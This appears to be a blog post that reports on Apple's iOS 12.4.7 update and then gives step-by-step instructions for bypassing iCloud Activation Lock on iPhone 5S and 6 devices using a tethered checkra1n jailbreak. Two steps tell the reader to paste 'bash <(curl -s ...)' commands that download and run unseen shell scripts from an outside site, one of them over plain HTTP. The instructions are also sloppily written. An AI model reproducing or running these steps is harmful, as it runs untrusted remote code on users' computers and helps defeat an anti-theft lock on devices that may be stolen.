Apple releases new iOS 12.4.7 update is a small maintenance update, for your iPhone, iPad, and iPod touch. Apple’s iOS 12.4.7 update comes with a shortlist of changes iPhone for 5S, iPhone 6 models. Apple says the iOS 12.4.7 update includes three security patches including two for the Mail app and one for Wi-Fi. If you value your device’s security, you’ll probably want to download the update right now. But the iCloud bypass was not patched. So you can still bypass iCloud on the latest version using @iRogerosx. This iCloud bypass is tethered, it means you still need to re-jailbreak your device every time you restart your device.
How to bypass icloud on iOS12.4.7
Bypass iCloud 12.4.7 ( iphone 6 and iPhone 5S bypass iphone 6 plus ios 12.4.7 )
- install all dependencies first copy and paste into the terminal: bash <(curl -s http://imadcydia.com/Bypas1.sh)
- jailbreak With Checkra1n
- install iTunes and then open iTunes
- do not select any wifi click on ( connect to iTunes )
- Open Terminal type Comand: iproxy 2222 44
- Waiting For connection
- Open new Terminal and copy this Comand: bash <(curl -s https://imadcydia.com/Bypas2.1.sh)
Related post how to bypass iCloud on iOS13.x including iOS 13.5. free method tethered.